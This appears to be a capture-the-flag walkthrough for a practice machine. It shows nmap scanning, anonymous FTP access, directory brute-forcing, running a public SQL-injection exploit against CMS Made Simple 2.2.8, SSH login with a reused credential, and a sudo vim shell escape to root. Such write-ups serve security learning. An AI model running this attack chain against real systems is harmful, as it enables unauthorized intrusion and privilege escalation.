- Port scan
nmap -Pn <ip>
2. Scan for services and OS detection
nmap -A -p 21,80,2222 <ip>There’re 3 services:
- 21 vsftpd 3.0.3 w/ anonymous login
- 80 Apache httpd 2.4.18 w/ robots.txt file
- 2222 OpenSSH 7.2p2
OS: Ubuntu
3. Vulnerable scan
nmap --script vuln -p 21,80,2222 <ip>/robots.txt again
4. Access FTP w/ anonymous login
ftp <ip>anonymous
lscd pub
ls
get ForMitch.txtexit
Read ForMitch.txt
cat ForMitch.txtSeems like this “mitch” person has the same password everywhere and easily cracked.
5. Access HTTP site
http://<ip>/Nothing much useful.
Access robots.txt
http://<ip>/robots.txt
Access openemr path
http://<ip>/openemr-5_0_1_3Nothing
Let’s find directory with dirb
dirb http://<ip>
Access /simple/
http://<ip>/simple/It’s cmsms or cms made simple.
version 2.2.8
Search for exploits
searchsploit cms made simple 2.2.8
Copy the script
searchsploit -m 46635
Review the script for usage. Seems like I can do sql injection and crack for credentials.
Run the script
python 46635.py -u http://<ip>/simple/ --crack -w rockyou.txt
Try to login to CMS
http://<ip>/simple/adminFailed!!!
Let’s try with mitch:secret
6. Access SSH. Since “mitch” uses same credential everywhere, It’s worth a try.
ssh mitch@<ip> -p 2222
ls cat user.txt
7. Privilege escalation
Check if I can run sudo
sudo -lI can run with vim
Command reference: https://gtfobins.github.io/gtfobins/vim/
sudo vim -c ':!/bin/sh'Now I’m root
cd /rootlscat root.txt
